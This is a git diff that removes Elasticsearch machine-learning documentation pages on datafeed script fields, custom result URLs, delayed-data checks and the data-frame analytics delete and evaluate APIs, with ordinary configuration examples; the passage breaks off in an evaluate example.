After you open the job and start the {dfeed} or supply data to the job, you can view the results in {kib}. For example, you can view the results in the **Anomaly Explorer**:

[role="screenshot"]
image::images/ml-population-results.png["Population analysis results in the Anomaly Explorer"]

As in this case, the results are often quite sparse. There might be just a few data points for the selected time period. Population analysis is particularly useful when you have many entities and the data for specific entities is sporadic or sparse.

If you click on a section in the timeline or swim lanes, you can see more details about the anomalies:

[role="screenshot"]
image::images/ml-population-anomaly.png["Anomaly details for a specific user"]

In this example, the client IP address `30.156.16.164` received a low volume of bytes on the date and time shown. This event is anomalous because the mean is three times lower than the expected behavior of the population.

diff --git a/docs/reference/ml/anomaly-detection/ml-configuring-transform.asciidoc b/docs/reference/ml/anomaly-detection/ml-configuring-transform.asciidoc deleted file mode 100644 index 3c1b0c98017..00000000000 --- a/docs/reference/ml/anomaly-detection/ml-configuring-transform.asciidoc +++ /dev/null @@ -1,587 +0,0 @@

[role="xpack"]
[[ml-configuring-transform]]
= Transforming data with script fields

If you use {dfeeds}, you can add scripts to transform your data before it is analyzed. {dfeeds-cap} contain an optional `script_fields` property, where you can specify scripts that evaluate custom expressions and return script fields.

If your {dfeed} defines script fields, you can use those fields in your {anomaly-job}. For example, you can use the script fields in the analysis functions in one or more detectors.
- -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -The following index APIs create and add content to an index that is used in -subsequent examples: - -[source,console] ----------------------------------- -PUT /my-index-000001 -{ - "mappings":{ - "properties": { - "@timestamp": { - "type": "date" - }, - "aborted_count": { - "type": "long" - }, - "another_field": { - "type": "keyword" <1> - }, - "clientip": { - "type": "keyword" - }, - "coords": { - "properties": { - "lat": { - "type": "keyword" - }, - "lon": { - "type": "keyword" - } - } - }, - "error_count": { - "type": "long" - }, - "query": { - "type": "keyword" - }, - "some_field": { - "type": "keyword" - }, - "tokenstring1":{ - "type":"keyword" - }, - "tokenstring2":{ - "type":"keyword" - }, - "tokenstring3":{ - "type":"keyword" - } - } - } -} - -PUT /my-index-000001/_doc/1 -{ - "@timestamp":"2017-03-23T13:00:00", - "error_count":36320, - "aborted_count":4156, - "some_field":"JOE", - "another_field":"SMITH ", - "tokenstring1":"foo-bar-baz", - "tokenstring2":"foo bar baz", - "tokenstring3":"foo-bar-19", - "query":"www.ml.elastic.co", - "clientip":"123.456.78.900", - "coords": { - "lat" : 41.44, - "lon":90.5 - } -} ----------------------------------- -// TEST[skip:SETUP] - -<1> In this example, string fields are mapped as `keyword` fields to support -aggregation. If you want both a full text (`text`) and a keyword (`keyword`) -version of the same field, use multi-fields. For more information, see -{ref}/multi-fields.html[fields]. - -[[ml-configuring-transform1]] -.Example 1: Adding two numerical fields -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/test1 -{ - "analysis_config":{ - "bucket_span": "10m", - "detectors":[ - { - "function":"mean", - "field_name": "total_error_count", <1> - "detector_description": "Custom script field transformation" - } - ] - }, - "data_description": { - "time_field":"@timestamp", - "time_format":"epoch_ms" - } -} - -PUT _ml/datafeeds/datafeed-test1 -{ - "job_id": "test1", - "indices": ["my-index-000001"], - "query": { - "match_all": { - "boost": 1 - } - }, - "script_fields": { - "total_error_count": { <2> - "script": { - "lang": "expression", - "source": "doc['error_count'].value + doc['aborted_count'].value" - } - } - } -} ----------------------------------- -// TEST[skip:needs-licence] - -<1> A script field named `total_error_count` is referenced in the detector -within the job. -<2> The script field is defined in the {dfeed}. - -This `test1` {anomaly-job} contains a detector that uses a script field in a -mean analysis function. The `datafeed-test1` {dfeed} defines the script field. -It contains a script that adds two fields in the document to produce a "total" -error count. - -The syntax for the `script_fields` property is identical to that used by {es}. -For more information, see -{ref}/search-fields.html#script-fields[Script fields]. 
- -You can preview the contents of the {dfeed} by using the following API: - -[source,console] ----------------------------------- -GET _ml/datafeeds/datafeed-test1/_preview ----------------------------------- -// TEST[skip:continued] - -In this example, the API returns the following results, which contain a sum of -the `error_count` and `aborted_count` values: - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "total_error_count": 40476 - } -] ----------------------------------- - -NOTE: This example demonstrates how to use script fields, but it contains -insufficient data to generate meaningful results. - -//For a full demonstration of -//how to create jobs with sample data, see <>. - -You can alternatively use {kib} to create an advanced {anomaly-job} that uses -script fields. To add the `script_fields` property to your {dfeed}, you must use -the **Edit JSON** tab. For example: - -[role="screenshot"] -image::images/ml-scriptfields.jpg[Adding script fields to a {dfeed} in {kib}] - -[[ml-configuring-transform-examples]] -== Common script field examples - -While the possibilities are limitless, there are a number of common scenarios -where you might use script fields in your {dfeeds}. - -[NOTE] -=============================== -Some of these examples use regular expressions. By default, regular -expressions are disabled because they circumvent the protection that Painless -provides against long running and memory hungry scripts. For more information, -see {ref}/modules-scripting-painless.html[Painless scripting language]. - -Machine learning analysis is case sensitive. For example, "John" is considered -to be different than "john". This is one reason you might consider using scripts -that convert your strings to upper or lowercase letters. -=============================== - -[[ml-configuring-transform2]] -.Example 2: Concatenating strings -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/test2 -{ - "analysis_config":{ - "bucket_span": "10m", - "detectors":[ - { - "function":"low_info_content", - "field_name":"my_script_field", <1> - "detector_description": "Custom script field transformation" - } - ] - }, - "data_description": { - "time_field":"@timestamp", - "time_format":"epoch_ms" - } -} - -PUT _ml/datafeeds/datafeed-test2 -{ - "job_id": "test2", - "indices": ["my-index-000001"], - "query": { - "match_all": { - "boost": 1 - } - }, - "script_fields": { - "my_script_field": { - "script": { - "lang": "painless", - "source": "doc['some_field'].value + '_' + doc['another_field'].value" <2> - } - } - } -} - -GET _ml/datafeeds/datafeed-test2/_preview --------------------------------------------------- -// TEST[skip:needs-licence] - -<1> The script field has a rather generic name in this case, since it will -be used for various tests in the subsequent examples. -<2> The script field uses the plus (+) operator to concatenate strings. 
- -The preview {dfeed} API returns the following results, which show that "JOE" -and "SMITH " have been concatenated and an underscore was added: - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "my_script_field": "JOE_SMITH " - } -] ----------------------------------- - -[[ml-configuring-transform3]] -.Example 3: Trimming strings -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-test2/_update -{ - "script_fields": { - "my_script_field": { - "script": { - "lang": "painless", - "source": "doc['another_field'].value.trim()" <1> - } - } - } -} - -GET _ml/datafeeds/datafeed-test2/_preview --------------------------------------------------- -// TEST[skip:continued] - -<1> This script field uses the `trim()` function to trim extra white space from a -string. - -The preview {dfeed} API returns the following results, which show that "SMITH " -has been trimmed to "SMITH": - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "my_script_field": "SMITH" - } -] ----------------------------------- - -[[ml-configuring-transform4]] -.Example 4: Converting strings to lowercase -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-test2/_update -{ - "script_fields": { - "my_script_field": { - "script": { - "lang": "painless", - "source": "doc['some_field'].value.toLowerCase()" <1> - } - } - } -} - -GET _ml/datafeeds/datafeed-test2/_preview --------------------------------------------------- -// TEST[skip:continued] - -<1> This script field uses the `toLowerCase` function to convert a string to all -lowercase letters. Likewise, you can use the `toUpperCase{}` function to convert -a string to uppercase letters. - -The preview {dfeed} API returns the following results, which show that "JOE" -has been converted to "joe": - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "my_script_field": "joe" - } -] ----------------------------------- - -[[ml-configuring-transform5]] -.Example 5: Converting strings to mixed case formats -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-test2/_update -{ - "script_fields": { - "my_script_field": { - "script": { - "lang": "painless", - "source": "doc['some_field'].value.substring(0, 1).toUpperCase() + doc['some_field'].value.substring(1).toLowerCase()" <1> - } - } - } -} - -GET _ml/datafeeds/datafeed-test2/_preview --------------------------------------------------- -// TEST[skip:continued] - -<1> This script field is a more complicated example of case manipulation. It uses -the `subString()` function to capitalize the first letter of a string and -converts the remaining characters to lowercase. 
- -The preview {dfeed} API returns the following results, which show that "JOE" -has been converted to "Joe": - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "my_script_field": "Joe" - } -] ----------------------------------- - -[[ml-configuring-transform6]] -.Example 6: Replacing tokens -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-test2/_update -{ - "script_fields": { - "my_script_field": { - "script": { - "lang": "painless", - "source": "/\\s/.matcher(doc['tokenstring2'].value).replaceAll('_')" <1> - } - } - } -} - -GET _ml/datafeeds/datafeed-test2/_preview --------------------------------------------------- -// TEST[skip:continued] - -<1> This script field uses regular expressions to replace white -space with underscores. - -The preview {dfeed} API returns the following results, which show that -"foo bar baz" has been converted to "foo_bar_baz": - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "my_script_field": "foo_bar_baz" - } -] ----------------------------------- - -[[ml-configuring-transform7]] -.Example 7: Regular expression matching and concatenation -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-test2/_update -{ - "script_fields": { - "my_script_field": { - "script": { - "lang": "painless", - "source": "def m = /(.*)-bar-([0-9][0-9])/.matcher(doc['tokenstring3'].value); return m.find() ? m.group(1) + '_' + m.group(2) : '';" <1> - } - } - } -} - -GET _ml/datafeeds/datafeed-test2/_preview --------------------------------------------------- -// TEST[skip:continued] - -<1> This script field looks for a specific regular expression pattern and emits the -matched groups as a concatenated string. If no match is found, it emits an empty -string. - -The preview {dfeed} API returns the following results, which show that -"foo-bar-19" has been converted to "foo_19": - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "my_script_field": "foo_19" - } -] ----------------------------------- - -[[ml-configuring-transform8]] -.Example 8: Splitting strings by domain name -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/test3 -{ - "description":"DNS tunneling", - "analysis_config":{ - "bucket_span": "30m", - "influencers": ["clientip","hrd"], - "detectors":[ - { - "function":"high_info_content", - "field_name": "sub", - "over_field_name": "hrd", - "exclude_frequent":"all" - } - ] - }, - "data_description": { - "time_field":"@timestamp", - "time_format":"epoch_ms" - } -} - -PUT _ml/datafeeds/datafeed-test3 -{ - "job_id": "test3", - "indices": ["my-index-000001"], - "query": { - "match_all": { - "boost": 1 - } - }, - "script_fields":{ - "sub":{ - "script":"return domainSplit(doc['query'].value).get(0);" - }, - "hrd":{ - "script":"return domainSplit(doc['query'].value).get(1);" - } - } -} - -GET _ml/datafeeds/datafeed-test3/_preview --------------------------------------------------- -// TEST[skip:needs-licence] - -If you have a single field that contains a well-formed DNS domain name, you can -use the `domainSplit()` function to split the string into its highest registered -domain and the sub-domain, which is everything to the left of the highest -registered domain. For example, the highest registered domain of -`www.ml.elastic.co` is `elastic.co` and the sub-domain is `www.ml`. 
The -`domainSplit()` function returns an array of two values: the first value is the -subdomain; the second value is the highest registered domain. - -The preview {dfeed} API returns the following results, which show that -"www.ml.elastic.co" has been split into "elastic.co" and "www.ml": - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "clientip.keyword": "123.456.78.900", - "hrd": "elastic.co", - "sub": "www.ml" - } -] ----------------------------------- - -[[ml-configuring-transform9]] -.Example 9: Transforming geo_point data -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/test4 -{ - "analysis_config":{ - "bucket_span": "10m", - "detectors":[ - { - "function":"lat_long", - "field_name": "my_coordinates" - } - ] - }, - "data_description": { - "time_field":"@timestamp", - "time_format":"epoch_ms" - } -} - -PUT _ml/datafeeds/datafeed-test4 -{ - "job_id": "test4", - "indices": ["my-index-000001"], - "query": { - "match_all": { - "boost": 1 - } - }, - "script_fields": { - "my_coordinates": { - "script": { - "source": "doc['coords.lat'].value + ',' + doc['coords.lon'].value", - "lang": "painless" - } - } - } -} - -GET _ml/datafeeds/datafeed-test4/_preview --------------------------------------------------- -// TEST[skip:needs-licence] - -In {es}, location data can be stored in `geo_point` fields but this data type is -not supported natively in {ml} analytics. This example of a script field -transforms the data into an appropriate format. For more information, -see <>. - -The preview {dfeed} API returns the following results, which show that -`41.44` and `90.5` have been combined into "41.44,90.5": - -[source,js] ----------------------------------- -[ - { - "@timestamp": 1490274000000, - "my_coordinates": "41.44,90.5" - } -] ----------------------------------- - diff --git a/docs/reference/ml/anomaly-detection/ml-configuring-url.asciidoc b/docs/reference/ml/anomaly-detection/ml-configuring-url.asciidoc deleted file mode 100644 index bd46bbd01e9..00000000000 --- a/docs/reference/ml/anomaly-detection/ml-configuring-url.asciidoc +++ /dev/null @@ -1,106 +0,0 @@ -[role="xpack"] -[[ml-configuring-url]] -= Adding custom URLs to machine learning results - -You can optionally attach one or more custom URLs to your {anomaly-jobs}. These -links appear in the anomalies table in the *Anomaly Explorer* and -*Single Metric Viewer* and can direct you to dashboards, the *Discover* app, or -external websites. For example, you can define a custom URL that provides a way -for users to drill down to the source data from the results set: - -[role="screenshot"] -image::images/ml-customurl.jpg["An example of the custom URL links in the Anomaly Explorer anomalies table"] - -When you create or edit an {anomaly-job} in {kib}, it simplifies the creation -of the custom URLs for {kib} dashboards and the *Discover* app and it enables -you to test your URLs. For example: - -[role="screenshot"] -image::images/ml-customurl-edit.gif["Add a custom URL in {kib}",width=75%] - -For each custom URL, you must supply the URL and a label, which is the link text -that appears in the anomalies table. You can also optionally supply a time -range. When you link to *Discover* or a {kib} dashboard, you'll have additional -options for specifying the pertinent index pattern or dashboard name and query -entities. 
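You can also attach custom URLs when you create or update a job through the API. For example, the following sketch adds a link to an external site by using the update {anomaly-job} API (the job name and URL are placeholders):

[source,console]
----------------------------------
POST _ml/anomaly_detectors/sample_job/_update
{
  "custom_settings": {
    "custom_urls": [
      {
        "url_name": "Raw logs", <1>
        "url_value": "http://my.internal.site/logs" <2>
      }
    ]
  }
}
----------------------------------
//TEST[skip:setup:sample_job]
<1> The label, which appears as the link text in the anomalies table.
<2> The URL. The next section describes how to include `$...$` tokens that are substituted with values from the anomaly record.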
- -[discrete] -[[ml-configuring-url-strings]] -== String substitution in custom URLs - -You can use dollar sign ($) delimited tokens in a custom URL. These tokens are -substituted for the values of the corresponding fields in the anomaly records. -For example, the `Raw data` URL might resolve to `discover#/?_g=(time:(from:'$earliest$',mode:absolute,to:'$latest$'))&_a=(index:ff959d40-b880-11e8-a6d9-e546fe2bba5f,query:(language:kuery,query:'customer_full_name.keyword:"$customer_full_name.keyword$"'))`. In this case, the pertinent value of the `customer_full_name.keyword` field -is passed to the target page when you click the link. - -TIP: Not all fields in your source data exist in the anomaly results. If a -field is specified in the detector as the `field_name`, `by_field_name`, -`over_field_name`, or `partition_field_name`, for example, it can be used in a -custom URL. A field that is used only in the `categorization_field_name` -property, however, does not exist in the anomaly results. When you create your -custom URL in {kib}, the *Query entities* option is shown only when there are -appropriate fields in the detectors. - -The `$earliest$` and `$latest$` tokens pass the beginning and end of the time -span of the selected anomaly to the target page. The tokens are substituted with -date-time strings in ISO-8601 format. If you selected an interval of 1 hour for -the anomalies table, these tokens use one hour on either side of the anomaly -time as the earliest and latest times. You can alter this behavior by setting a -time range for the custom URL. - -There are also `$mlcategoryregex$` and `$mlcategoryterms$` tokens, which pertain -to {anomaly-jobs} where you are categorizing field values. For more information -about this type of analysis, see <>. The -`$mlcategoryregex$` token passes the regular expression value of the category of -the selected anomaly, as identified by the value of the `mlcategory` field of -the anomaly record. The `$mlcategoryterms$` token passes the terms value of the -category of the selected anomaly. Each categorization term is prefixed by a plus -(+) character, so that when the token is passed to a {kib} dashboard, the -resulting dashboard query seeks a match for all of the terms of the category. -For example, the following API updates a job to add a custom URL that uses -`$earliest$`, `$latest$`, and `$mlcategoryterms$` tokens: - -[source,console] ----------------------------------- -POST _ml/anomaly_detectors/sample_job/_update -{ - "custom_settings": { - "custom_urls": [ - { - "url_name": "test-link1", - "time_range": "1h", - "url_value": "discover#/?_g=(time:(from:'$earliest$',mode:quick,to:'$latest$'))&_a=(index:'90943e30-9a47-11e8-b64d-95841ca0b247',query:(language:lucene,query_string:(analyze_wildcard:!t,query:'$mlcategoryterms$')),sort:!(time,desc))" - } - ] - } -} ----------------------------------- -//TEST[skip:setup:sample_job] - -When you click this custom URL in the anomalies table in {kib}, it opens up the -*Discover* page and displays source data for the period one hour before and -after the anomaly occurred. Since this job is categorizing log messages, some -`$mlcategoryterms$` token values that are passed to the target page in the query -might include `+REC +Not +INSERTED +TRAN +Table +hostname +dbserver.acme.com`. - -[TIP] -=============================== -* The custom URL links in the anomaly tables use pop-ups. You must configure -your web browser so that it does not block pop-up windows or create an exception -for your {kib} URL. 
* When creating a link to a {kib} dashboard, the URLs for dashboards can be very long. Be careful of typos, end of line characters, and URL encoding. Also ensure you use the appropriate index ID for the target {kib} index pattern.
* If you use an influencer name for string substitution, keep in mind that it might not always be available in the analysis results and the URL is invalid in those cases. There is not always a statistically significant influencer for each anomaly.
* The dates substituted for the `$earliest$` and `$latest$` tokens are in ISO-8601 format and the target system must understand this format.
* If the job performs an analysis against nested JSON fields, the tokens for string substitution can refer to these fields using dot notation. For example, `$cpu.total$`.
* {es} source data mappings might make it difficult for the query string to work. Test the custom URL before saving the job configuration to check that it works as expected, particularly when using string substitution.
===============================

diff --git a/docs/reference/ml/anomaly-detection/ml-delayed-data-detection.asciidoc b/docs/reference/ml/anomaly-detection/ml-delayed-data-detection.asciidoc deleted file mode 100644 index e1de295e43e..00000000000 --- a/docs/reference/ml/anomaly-detection/ml-delayed-data-detection.asciidoc +++ /dev/null @@ -1,53 +0,0 @@

[role="xpack"]
[[ml-delayed-data-detection]]
= Handling delayed data

Delayed data are documents that are indexed late: they relate to a time span that your {dfeed} has already processed, so they are never analyzed by your {anomaly-job}.

When you create a {dfeed}, you can specify a {ref}/ml-put-datafeed.html#ml-put-datafeed-request-body[`query_delay`] setting. This setting enables the {dfeed} to wait for some time past real-time, which means any "late" data in this period is fully indexed before the {dfeed} tries to gather it. However, if the setting is too low, the {dfeed} may query for data before it has been indexed and consequently miss those documents. Conversely, if it is set too high, analysis drifts farther away from real-time. The balance that is struck depends upon each use case and the environmental factors of the cluster.

== Why worry about delayed data?

This is a pertinent question. If data are delayed randomly (and consequently are missing from analysis), the results of certain types of functions are not really affected. In these situations, the overall results even out because the delayed data is distributed randomly. An example would be a `mean` metric for a field in a large collection of data. In this case, checking for delayed data may not provide much benefit. If data are consistently delayed, however, {anomaly-jobs} with a `low_count` function may produce false positives. In this situation, it would be useful to see whether data arrives after an anomaly is recorded so that you can determine the next course of action.

== How do we detect delayed data?

In addition to the `query_delay` setting, there is a delayed data check configuration (`delayed_data_check_config`), which enables you to configure the datafeed to look in the past for delayed data. Every 15 minutes or every `check_window`, whichever is smaller, the datafeed triggers a document search over the configured indices. This search looks over a time span with a length of `check_window` ending with the latest finalized bucket.
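For example, a {dfeed} that waits two minutes past real time before querying and that checks the previous day for delayed data might be configured as follows (a sketch; the job ID, index pattern, and values are illustrative):

[source,console]
----------------------------------
PUT _ml/datafeeds/datafeed-it_ops_app_logs
{
  "job_id": "it_ops_app_logs", <1>
  "indices": ["it-ops-logs-*"],
  "query_delay": "120s", <2>
  "delayed_data_check_config": {
    "enabled": true,
    "check_window": "1d" <3>
  }
}
----------------------------------
// TEST[skip:needs-licence]
<1> The {anomaly-job} that consumes this {dfeed}.
<2> The {dfeed} waits two minutes past real time before querying, which gives late documents time to be indexed.
<3> The delayed data check searches over the previous day, ending with the latest finalized bucket.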
That `check_window` time span is partitioned into buckets, whose length equals the bucket span of the associated {anomaly-job}. The `doc_count` of those buckets is then compared with the job's finalized analysis buckets to see whether any data has arrived since the analysis. If data is indeed missing because of ingest delay, the end user is notified. For example, you can see annotations in {kib} for the periods where these delays occur.

== What to do about delayed data?

The most common course of action is simply to do nothing. For many functions and situations, ignoring the data is acceptable. However, if the amount of delayed data is too great or the situation calls for it, the next course of action to consider is to increase the `query_delay` of the datafeed. This increased delay allows more time for data to be indexed. If you have real-time constraints, however, an increased delay might not be desirable. In that case, you need to {ref}/tune-for-indexing-speed.html[tune for better indexing speed].

diff --git a/docs/reference/ml/df-analytics/apis/delete-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/delete-dfanalytics.asciidoc deleted file mode 100644 index 29e78f43fb7..00000000000 --- a/docs/reference/ml/df-analytics/apis/delete-dfanalytics.asciidoc +++ /dev/null @@ -1,69 +0,0 @@

[role="xpack"]
[testenv="platinum"]
[[delete-dfanalytics]]
= Delete {dfanalytics-jobs} API
[subs="attributes"]
++++
Delete {dfanalytics-jobs}
++++

Deletes an existing {dfanalytics-job}.

experimental[]

[[ml-delete-dfanalytics-request]]
== {api-request-title}

`DELETE _ml/data_frame/analytics/`

[[ml-delete-dfanalytics-prereq]]
== {api-prereq-title}

If the {es} {security-features} are enabled, you must have the following built-in roles or equivalent privileges:

* `machine_learning_admin`

For more information, see <> and {ml-docs-setup-privileges}.

[[ml-delete-dfanalytics-path-params]]
== {api-path-parms-title}

``::
(Required, string)
include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics]

[[ml-delete-dfanalytics-query-params]]
== {api-query-parms-title}

`force`::
  (Optional, Boolean) If `true`, it deletes a job that is not stopped; this method is
  quicker than stopping and deleting the job.

`timeout`::
  (Optional, <>) The time to wait for the job to be deleted.
  Defaults to 1 minute.

[[ml-delete-dfanalytics-example]]
== {api-examples-title}

The following example deletes the `loganalytics` {dfanalytics-job}:

[source,console]
--------------------------------------------------
DELETE _ml/data_frame/analytics/loganalytics
--------------------------------------------------
// TEST[skip:TBD]

The API returns the following result:

[source,console-result]
----
{
  "acknowledged" : true
}
----

diff --git a/docs/reference/ml/df-analytics/apis/delete-trained-models.asciidoc b/docs/reference/ml/df-analytics/apis/delete-trained-models.asciidoc deleted file mode 100644 index 6c64df9a3a3..00000000000 --- a/docs/reference/ml/df-analytics/apis/delete-trained-models.asciidoc +++ /dev/null @@ -1,69 +0,0 @@

[role="xpack"]
[testenv="basic"]
[[delete-trained-models]]
= Delete trained models API
[subs="attributes"]
++++
Delete trained models
++++

Deletes an existing trained {infer} model that is currently not referenced by an ingest pipeline.
- -experimental[] - - -[[ml-delete-trained-models-request]] -== {api-request-title} - -`DELETE _ml/trained_models/` - - -[[ml-delete-trained-models-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following built-in roles or equivalent privileges: - -* `machine_learning_admin` - -For more information, see <> and {ml-docs-setup-privileges}. - - -[[ml-delete-trained-models-path-params]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-id] - - -[[ml-delete-trained-models-response-codes]] -== {api-response-codes-title} - -`409`:: - The code indicates that the trained model is referenced by an ingest pipeline - and cannot be deleted. - - -[[ml-delete-trained-models-example]] -== {api-examples-title} - -The following example deletes the `regression-job-one-1574775307356` trained -model: - -[source,console] --------------------------------------------------- -DELETE _ml/trained_models/regression-job-one-1574775307356 --------------------------------------------------- -// TEST[skip:TBD] - -The API returns the following result: - - -[source,console-result] ----- -{ - "acknowledged" : true -} ----- - diff --git a/docs/reference/ml/df-analytics/apis/evaluate-dfanalytics.asciidoc b/docs/reference/ml/df-analytics/apis/evaluate-dfanalytics.asciidoc deleted file mode 100644 index 70be9d067bc..00000000000 --- a/docs/reference/ml/df-analytics/apis/evaluate-dfanalytics.asciidoc +++ /dev/null @@ -1,541 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[evaluate-dfanalytics]] -= Evaluate {dfanalytics} API - -[subs="attributes"] -++++ -Evaluate {dfanalytics} -++++ - -Evaluates the {dfanalytics} for an annotated index. - -experimental[] - - -[[ml-evaluate-dfanalytics-request]] -== {api-request-title} - -`POST _ml/data_frame/_evaluate` - - -[[ml-evaluate-dfanalytics-prereq]] -== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following privileges: - -* cluster: `monitor_ml` - -For more information, see <> and -{ml-docs-setup-privileges}. - - -[[ml-evaluate-dfanalytics-desc]] -== {api-description-title} - -The API packages together commonly used evaluation metrics for various types of -machine learning features. This has been designed for use on indexes created by -{dfanalytics}. Evaluation requires both a ground truth field and an analytics -result field to be present. - - -[[ml-evaluate-dfanalytics-request-body]] -== {api-request-body-title} - -`evaluation`:: -(Required, object) Defines the type of evaluation you want to perform. -See <>. -+ --- -Available evaluation types: - -* `outlier_detection` -* `regression` -* `classification` - --- - -`index`:: -(Required, object) Defines the `index` in which the evaluation will be -performed. - -`query`:: -(Optional, object) A query clause that retrieves a subset of data from the -source index. See <>. - -[[ml-evaluate-dfanalytics-resources]] -== {dfanalytics-cap} evaluation resources - -[[oldetection-resources]] -=== {oldetection-cap} evaluation objects - -{oldetection-cap} evaluates the results of an {oldetection} analysis which -outputs the probability that each document is an outlier. - -`actual_field`:: - (Required, string) The field of the `index` which contains the `ground truth`. - The data type of this field can be boolean or integer. If the data type is - integer, the value has to be either `0` (false) or `1` (true). 
- -`predicted_probability_field`:: - (Required, string) The field of the `index` that defines the probability of - whether the item belongs to the class in question or not. It's the field that - contains the results of the analysis. - -`metrics`:: - (Optional, object) Specifies the metrics that are used for the evaluation. - Available metrics: - - `auc_roc`::: - (Optional, object) The AUC ROC (area under the curve of the receiver - operating characteristic) score and optionally the curve. Default value is - {"include_curve": false}. - - `confusion_matrix`::: - (Optional, object) Set the different thresholds of the {olscore} at where - the metrics (`tp` - true positive, `fp` - false positive, `tn` - true - negative, `fn` - false negative) are calculated. Default value is - {"at": [0.25, 0.50, 0.75]}. - - `precision`::: - (Optional, object) Set the different thresholds of the {olscore} at where - the metric is calculated. Default value is {"at": [0.25, 0.50, 0.75]}. - - `recall`::: - (Optional, object) Set the different thresholds of the {olscore} at where - the metric is calculated. Default value is {"at": [0.25, 0.50, 0.75]}. - - -[[regression-evaluation-resources]] -=== {regression-cap} evaluation objects - -{regression-cap} evaluation evaluates the results of a {regression} analysis -which outputs a prediction of values. - -`actual_field`:: - (Required, string) The field of the `index` which contains the `ground truth`. - The data type of this field must be numerical. - -`predicted_field`:: - (Required, string) The field in the `index` that contains the predicted value, - in other words the results of the {regression} analysis. - -`metrics`:: - (Optional, object) Specifies the metrics that are used for the evaluation. For - more information on `mse`, `msle`, and `huber`, consult - https://github.com/elastic/examples/tree/master/Machine%20Learning/Regression%20Loss%20Functions[the Jupyter notebook on regression loss functions]. - Available metrics: - - `mse`::: - (Optional, object) Average squared difference between the predicted values - and the actual (`ground truth`) value. For more information, read - {wikipedia}/Mean_squared_error[this wiki article]. - - `msle`::: - (Optional, object) Average squared difference between the logarithm of the - predicted values and the logarithm of the actual (`ground truth`) value. - - `offset`:::: - (Optional, double) Defines the transition point at which you switch from - minimizing quadratic error to minimizing quadratic log error. Defaults to - `1`. - - `huber`::: - (Optional, object) Pseudo Huber loss function. For more information, read - {wikipedia}/Huber_loss#Pseudo-Huber_loss_function[this wiki article]. - - `delta`:::: - (Optional, double) Approximates 1/2 (prediction - actual)^2^ for values - much less than delta and approximates a straight line with slope delta for - values much larger than delta. Defaults to `1`. Delta needs to be greater - than `0`. - - `r_squared`::: - (Optional, object) Proportion of the variance in the dependent variable that - is predictable from the independent variables. For more information, read - {wikipedia}/Coefficient_of_determination[this wiki article]. - - - -[[classification-evaluation-resources]] -== {classification-cap} evaluation objects - -{classification-cap} evaluation evaluates the results of a {classanalysis} which -outputs a prediction that identifies to which of the classes each document -belongs. - -`actual_field`:: - (Required, string) The field of the `index` which contains the `ground truth`. 
- The data type of this field must be categorical. - -`predicted_field`:: - (Optional, string) The field in the `index` which contains the predicted value, - in other words the results of the {classanalysis}. - -`top_classes_field`:: - (Optional, string) The field of the `index` which is an array of documents - of the form `{ "class_name": XXX, "class_probability": YYY }`. - This field must be defined as `nested` in the mappings. - -`metrics`:: - (Optional, object) Specifies the metrics that are used for the evaluation. - Available metrics: - - `accuracy`::: - (Optional, object) Accuracy of predictions (per-class and overall). - - `auc_roc`::: - (Optional, object) The AUC ROC (area under the curve of the receiver - operating characteristic) score and optionally the curve. - It is calculated for a specific class (provided as "class_name") treated as - positive. - - `class_name`:::: - (Required, string) Name of the only class that is treated as positive - during AUC ROC calculation. Other classes are treated as negative - ("one-vs-all" strategy). All the evaluated documents must have - `class_name` in the list of their top classes. - - `include_curve`:::: - (Optional, Boolean) Whether or not the curve should be returned in - addition to the score. Default value is false. - - `multiclass_confusion_matrix`::: - (Optional, object) Multiclass confusion matrix. - - `precision`::: - (Optional, object) Precision of predictions (per-class and average). - - `recall`::: - (Optional, object) Recall of predictions (per-class and average). - - -//// -[[ml-evaluate-dfanalytics-results]] -== {api-response-body-title} - -`outlier_detection`:: - (object) If you chose to do outlier detection, the API returns the - following evaluation metrics: - -`auc_roc`::: TBD - -`confusion_matrix`::: TBD - -`precision`::: TBD - -`recall`::: TBD -//// - - -[[ml-evaluate-dfanalytics-example]] -== {api-examples-title} - - -[[ml-evaluate-oldetection-example]] -=== {oldetection-cap} - -[source,console] --------------------------------------------------- -POST _ml/data_frame/_evaluate -{ - "index": "my_analytics_dest_index", - "evaluation": { - "outlier_detection": { - "actual_field": "is_outlier", - "predicted_probability_field": "ml.outlier_score" - } - } -} --------------------------------------------------- -// TEST[skip:TBD] - -The API returns the following results: - -[source,console-result] ----- -{ - "outlier_detection": { - "auc_roc": { - "score": 0.92584757746414444 - }, - "confusion_matrix": { - "0.25": { - "tp": 5, - "fp": 9, - "tn": 204, - "fn": 5 - }, - "0.5": { - "tp": 1, - "fp": 5, - "tn": 208, - "fn": 9 - }, - "0.75": { - "tp": 0, - "fp": 4, - "tn": 209, - "fn": 10 - } - }, - "precision": { - "0.25": 0.35714285714285715, - "0.5": 0.16666666666666666, - "0.75": 0 - }, - "recall": { - "0.25": 0.5, - "0.5": 0.1, - "0.75": 0 - } - } -} ----- - - -[[ml-evaluate-regression-example]] -=== {regression-cap} - -[source,console] --------------------------------------------------- -POST _ml/data_frame/_evaluate -{ - "index": "house_price_predictions", 